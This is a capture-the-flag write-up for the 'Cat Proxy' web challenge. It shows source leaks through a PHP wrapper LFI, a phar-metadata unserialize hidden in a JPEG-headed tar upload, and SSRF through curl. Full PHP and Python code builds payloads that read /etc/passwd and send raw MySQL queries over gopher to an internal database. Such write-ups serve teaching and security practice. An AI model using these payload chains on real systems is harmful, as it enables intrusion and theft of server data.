TenDollar CTF - Cat Proxy writeup


Category : Web

Solver : 1

Tag : LFI, Unserialize, SSRF, MySQL


Author: @shpik


Server Info: http://web2.tendollar.kr:8100/


It have 3 menu in this site.

  • Home
  • Login
  • Join

First, sign in at join page, then you show additional 2 menu.

  • Nyaa
  • Profile

Input url in nyaa page and the page you inputed will be displayed on the screen in nyaaa page.

If you upload to image in Profile page, then will be change your avatar to uploaded image.

I have uploaded a .php file but it seems that it can not be uploaded unless the extension is jpg, jpeg, gif, png.

This site handles the page through the p parameter.

You can leak the source code using a php wrapper to p parameter.


<!-- index.php -->
    $page = $_GET['p'];
    if(is_null($page) || is_array($page)|| $page==''){
        $page = 'home';
            $page = 'home';

Leaks config.php and lib.php source code.

<!-- config.php -->
//	error_reporting(0);
    $host = "catproxy_db_1";
    $user = "cat";
    $db_schema = "cat";
	$port = 3306;
    $mysql = new mysqli($host, $user, "", $db_schema,$port);
    $mysql->query("SET NAMES utf8");


<!-- lib.php -->
    class Requests{
        public $url;

        function __construct($url){
            $this->url = $url;
        function __destruct(){
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $this->url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $output = curl_exec($ch);
            echo '<div class="description">'.$output.'</div>';

config.php contains information about the database connection, but it does not have a password.

Requests class is declared in lib.php.

This class executes curl based on the url you entered when declaring it.

The important code is ini_set ('phar.readonly', 0); with the phar.readonly option set to False.

Leaks nyaa.php and nyaaa.php source code.

<!-- nyaa.php -->
    if($_SESSION['is_login'] !==1 ) die("<script>alert('Login please.');history.back();</script>");
<div class="description"><br><br>
	<form action="?p=nyaaa" method="post">
        <center>Cat is going to anywhere!!!</center><br><br>
		<table class="loginform">
                <td>URL : </td>
                <td><input type="text" name="url" size="80"></td>
                <td colspan=2 style="align: right;"><input type="submit" value="Request"></td>
<!-- nyaaa.php -->
    if($_SESSION['is_login'] !==1 ) die("<script>alert('Login please.');history.back();</script>");
<div class="description"><br><br>
    Result : <br><br>
        $url = $_POST['url'];
            echo "Hacking Detected!<br>What's are you doing now nyaa?!";
            $obj = new Requests($url);

nyaaa.php prints the result of executing curl on inputed url.

However, since the input value “url” is filtered, it can not be requested except http and https.

Leaks profile.php and uploadThumb.php source code.

<!-- profile.php -->
    if($_SESSION['is_login'] !==1 ) die("<script>alert('Login please.');history.back();</script>");
<div class="description"><br><br>
	<form enctype="multipart/form-data" action="?p=uploadThumb" method="post">
		<table class="loginform">
				<td colspan=2 style="text-align: left;"><img src="uploads/<?=$_SESSION['avatar'];?>" style="height: 100px; width: 100px; object-fit: contain; vertical-align: middle; border: 1px solid #000000;"></td><td style="text-align: left;">ID : <?=$_SESSION['id'];?></td>
                <td>Update Avatar : </td>
                <td colspan=2 style="text-align: right;"><input type="file" name="thumb" value="upload"><input type="submit" value="upload"></td>

<!-- uploadThumb.php -->
    if($_SESSION['is_login'] !==1 ) die("<script>alert('Login please.');history.back();</script>");
    $allowExt = Array('jpg','jpeg','png','gif');
    $fname = $_FILES['thumb']['name'];
    $fname = array_pop(explode('./',$fname));

        echo "<script>alert('Already uploaded file.\\nPlease change filename.');history.back();</script>";
        $ext = strtolower(array_pop(explode('.',$fname)));
        if($_FILES['thumb']['error'] !== 0){
            die("<script>alert('Upload Error!');history.back();</script>");
        if(!in_array($ext, $allowExt)){
            die("<script>alert('Sorry, not allow extension.');history.back();</script>");

        $contents = file_get_contents($_FILES['thumb']['tmp_name']);

            if(substr($contents,0,3)!="\xFF\xD8\xFF") die("<script>alert('JPG is corrupted.\\nSorry.');history.back();</script>");
        }else if($ext=="jpeg"){
            if(substr($contents,0,3)!="\xFF\xD8\xFF") die("<script>alert('JPEG is corrupted.\\nSorry.');history.back();</script>");
        }else if($ext=="png"){
            if(substr($contents,0,4)!="\x89PNG") die("<script>alert('PNG is corrupted.\\nSorry.');history.back();</script>");
        }else if($ext=="gif"){
            if(substr($contents,0,4)!="GIF8") die("<script>alert('GIF is corrupted.\\nSorry.');history.back();</script>");
            die("<script>alert('Something error.\\nSorry.');history.back();</script>");

        @move_uploaded_file($_FILES['thumb']['tmp_name'], $fname);

        $id = $mysql->real_escape_string($_SESSION['id']);
        $sql = "UPDATE users SET thumb='".$mysql->real_escape_string($fname)."' WHERE id='".$id."';";
        $result = $mysql->query($sql);
            $_SESSION['avatar'] = $fname;
            echo("<script>alert('Successfully Avatar Change!');history.back();</script>");
            echo("<script>alert('Upload failed!');history.back();</script>");

uploadThumb.php checks extension of image file you want to upload, if same name does not exist, checks header of image file.

then, image file is uploaded.

Vulnerability exists on this page, and vulnerability is file_exists function.

file_exists function unserialize the Metadata contained in the phar file with phar wrapper.

(e.g. phar://test.phar)

We can guess that the given Requests class is a Server Side Request Forgery (SSRF).

Unserialize using file function

If you open a phar file that contains objects as Metadata through phar wrapper on file-related functions, unserialize occurs.

e.g. file_exists(“phar://shpik.phar”);

This vulnerability occurs in the following functions, including file_exists:

  • include(‘phar://test.phar’);
  • file_get_contents(‘phar://test.phar’);
  • file_put_contents(‘phar://test.phar’, ‘’);
  • copy(‘phar://test.phar’, ‘’);
  • file_exists(‘phar://test.phar’);
  • is_executable(‘phar://test.phar’);
  • is_file(‘phar://test.phar’);
  • is_dir(‘phar://test.phar’);
  • is_link(‘phar://test.phar’);
  • is_writable(‘phar://test.phar‘);
  • fileperms(‘phar://test.phar’);
  • fileinode(‘phar://test.phar’);
  • filesize(‘phar://test.phar’);
  • fileowner(‘phar://test.phar’);
  • filegroup(‘phar://test.phar’);
  • fileatime(‘phar://test.phar’);
  • filemtime(‘phar://test.phar’);
  • filectime(‘phar://test.phar’);
  • filetype(‘phar://test.phar’);
  • getimagesize(‘phar://test.phar’);
  • exif_read_data(‘phar://test.phar’);
  • stat(‘phar://test.phar’);
  • lstat(‘phar://test.phar’);
  • touch(‘phar://test.phar‘);
  • md5_file(‘phar://test.phar’);
  • and so on..

First, create phar file using below code.


class Requests{
    public $url;

    function __construct($url){
        $this->url = $url;
    function __destruct(){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $output = curl_exec($ch);
        echo $output;

$phar = new Phar("phar.phar");
$phar->setStub("<?php echo 'STUB!'; __HALT_COMPILER(); ?>");
$obj = new Requests('file:///etc/passwd');

The important thing when creating phar file is that Metadata

It must contain Object to be unserialized.

We have created phar file that read “/etc/passwd”.

Now, let’s check if /etc/passwd is normally read in the file_exists.

class Requests{
    public $url;

    function __construct($url){
        $this->url = $url;
    function __destruct(){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $output = curl_exec($ch);
        echo $output;


Successfully read!!!

However, image file we can upload are jpg, jpeg, gif, png.

// in uploadThumbnail.php 
$allowExt = Array('jpg','jpeg','png','gif');
    $fname = $_FILES['thumb']['name'];
    $fname = array_pop(explode('./',$fname));

        echo "<script>alert('Already uploaded file.\\nPlease change filename.');history.back();</script>";
        $ext = strtolower(array_pop(explode('.',$fname)));
        if($_FILES['thumb']['error'] !== 0){
            die("<script>alert('Upload Error!');history.back();</script>");
        if(!in_array($ext, $allowExt)){
            die("<script>alert('Sorry, not allow extension.');history.back();</script>");

Fortunately phar is not sensitive to extensions.


Now you need to match the header.

    if(substr($contents,0,3)!="\xFF\xD8\xFF") die("<script>alert('JPG is corrupted.\\nSorry.');history.back();</script>");
}else if($ext=="jpeg"){
    if(substr($contents,0,3)!="\xFF\xD8\xFF") die("<script>alert('JPEG is corrupted.\\nSorry.');history.back();</script>");
}else if($ext=="png"){
    if(substr($contents,0,4)!="\x89PNG") die("<script>alert('PNG is corrupted.\\nSorry.');history.back();</script>");
}else if($ext=="gif"){
    if(substr($contents,0,4)!="GIF8") die("<script>alert('GIF is corrupted.\\nSorry.');history.back();</script>");
    die("<script>alert('Something error.\\nSorry.');history.back();</script>");

To make it, I made phar into tar format.

In the case of tar, name of file can be change freely.

However, when changing the header of tar, checksum should also be calculated and changed.

I used to make the phar data tar using below code.

class Requests{
    public $url;

    function __construct($url){
        $this->url = $url;
    function __destruct(){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $output = curl_exec($ch);
        echo $output;

$phar = new PharData("get_flag.tar");
$phar["AAABshpik"] = "FLAGFLAGFLAG";
$obj = new Requests('file:///etc/passwd');

The hex value of generated test.tar is as follows.

The first part contains the data you put through $phar["AAABshpik"] = "FLAGFLAGFLAG";.

Now, in “AAABshpik”, you should change AAA to “\xFF\xD8\xFF”, which is the first part of the header that is checked when you upload jpg.

Next, you should change the checksum.

I changed the name through the code below, and calculated the checksum.

import sys
import struct

def calcChecksum(data):
	return sum(struct.unpack_from("148B8x356B",data))+256

if __name__=="__main__":
	if len(sys.argv)!=3:
		print "argv[1] is filename\nargv[2] is output filename.\n"
		with open(sys.argv[1],'rb') as f:
			data = f.read()
		# Make new checksum
		new_name = "\xFF\xD8\xFF\xDBshpik".ljust(100,'\x00')
		new_data = new_name + data[100:]
		checksum = calcChecksum(new_data)
		new_checksum = oct(checksum).rjust(7,'0')+'\x00'
		new_data = new_name + data[100:148] + new_checksum + data[156:]

		with open(sys.argv[2],'wb') as f:

Now upload the file generated by the above code to the server.

filename : shpik_etcpasswd.jpg

Then phar://shpik_etcpasswd.jpg should be uploaded.

But there is urldecode funtion in file_exists function, we uploaded “phar%3a%2f%2fshpik_etcpasswd.jpg”.

filename : phar%3a%2f%2fshpik_etcpasswd.jpg

You have successfully read /etc/passwd.

If the flag exists as a file, we can not find the file name using this vulnerability.

So I think it will be in the database.

database is mysql and password does not set(null).

Connect to mysql and extract data using gopher wrapper!

I use below code made mysql raw socket.

import struct

def raw_encode(data):
    query = ''
    for i in range(len(data)/2):
        query += '%' + data[2*i:2*(i+1)]
    return unicode(query)

p_4 = lambda x:struct.pack('<L',x)

# SSRF MySQL without password
username = 'cat'
username = username.encode('hex')

# prefix + username(hex) + \x00 + password(\x00) + suffix
connect =  "85a21e0000000040080000000000000000000000000000000000000000000000"
connect += username
connect += '00'
connect += '00'
connect += "6d7973716c5f6e61746976655f70617373776f72640061035f6f730964656269616e362e300c5f636c69656e745f6e616d65086c69626d7973716c045f7069640532323334340f5f636c69656e745f76657273696f6e08352e362e362d6d39095f706c6174666f726d067838365f363403666f6f03626172"
connect = hex(len(connect)/2)[2:]+"000001"+connect

# \x03 = exec query
query = "select * from information_schema.tables where table_schema='cat';"
raw_query = "03"
raw_query += query.encode('hex')
raw_query = p_4(len(query)+1).encode('hex')+raw_query

# quit
disconnect = '0100000001'

data = raw_encode(connect + raw_query + disconnect)

print "gopher://catproxy_db_1:3306/_"+data
$ python mysql_raw_connect.py

I create tar using url containing gopher wapper and mysql raw socket.

$phar = new PharData("get_tables.tar");
$phar["AAABshpik"] = "FLAGFLAGFLAG";
$obj = new Requests('gopher://catproxy_db_1:3306/_%9d%00%00%01%85%a2%1e%00%00%00%00%40%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%63%61%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%61%03%5f%6f%73%09%64%65%62%69%61%6e%36%2e%30%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%32%33%34%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%08%35%2e%36%2e%36%2d%6d%39%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%03%66%6f%6f%03%62%61%72%42%00%00%00%03%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%27%63%61%74%27%3b%01%00%00%00%01');

Now, in “AAABshpik”, you should change AAA to “\ xFF \ xD8 \ xFF”, and upload this file to the server.

filename : phar%3a%2f%2fshpik_tables.jpg

HTTP/1.1 200 OK
Date: Wed, 28 Nov 2018 12:08:45 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2578
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
	<title>CAT Proxy</title>
	<link rel=stylesheet href="index.css">
    <div class="menu">
        <div style="text-align: left; padding-left: 50px;font-size: 20px; font-style: bold;">Cat Proxy</div><br>
        <a href="?p=home" class="menu_a">Home</a>
        <a href="?p=nyaa" class="menu_a">Nyaa</a> <a href="?p=profile" class="menu_a">Profile</a> <a href="?p=logout" class="menu_a">Logout</a>    </div><script>alert('Already uploaded file.\nPlease change filename.');history.back();</script></body>
</html><div class="description">J   
5.7.24 g  ci   ?           0VMk7Zh. mysql_native_password           N  definformation_schematablesTABLES
TABLE_CATALOG    ?    L  definformation_schematablesTABLESTABLE_SCHEMATABLE_SCHEMA @   ?    H  definformation_schematablesTABLES
TABLE_NAME @   ?    H  definformation_schematablesTABLES
TABLE_TYPE @   ?    @  definformation_schematablesTABLESENGINEENGINE @   ?     B  definformation_schematablesTABLESVERSIONVERSION?         H  definformation_schematablesTABLES
   ?     H  	definformation_schematablesTABLES
TABLE_ROWS?         P  
definformation_schematablesTABLESAVG_ROW_LENGTHAVG_ROW_LENGTH?         J  definformation_schematablesTABLESDATA_LENGTHDATA_LENGTH?         R  definformation_schematablesTABLESMAX_DATA_LENGTHMAX_DATA_LENGTH?         L  
definformation_schematablesTABLESINDEX_LENGTHINDEX_LENGTH?         F  definformation_schematablesTABLES	DATA_FREE	DATA_FREE?         P  definformation_schematablesTABLESAUTO_INCREMENTAUTO_INCREMENT?         J  definformation_schematablesTABLESCREATE_TIMECREATE_TIME?    €    J  definformation_schematablesTABLESUPDATE_TIMEUPDATE_TIME?    €    H  definformation_schematablesTABLES
CHECK_TIME?    €    R  definformation_schematablesTABLESTABLE_COLLATIONTABLE_COLLATION     ?     D  definformation_schematablesTABLESCHECKSUMCHECKSUM?         P  definformation_schematablesTABLESCREATE_OPTIONSCREATE_OPTIONS    ?     N  definformation_schematablesTABLES
TABLE_COMMENT    ?      ?  " f  defcatflag
BASE TABLEInnoDB10Dynamic0016384000?2018-11-24 03:42:04嬅latin1_swedish_ci?  }  defcatusers
BASE TABLEInnoDB10Dynamic4239016384000?2018-11-24 03:42:042018-11-28 12:08:36?latin1_swedish_ci?    ?  " </div>

You can see that there are flag and user in cat.

Now you can create a phar file that executes “select * from cat.flag” and upload it to the server to get the flag.

FLAG : TDCTF{W0W_Do_you_know_SSRF_Shiina_Mashiro_Kawaii}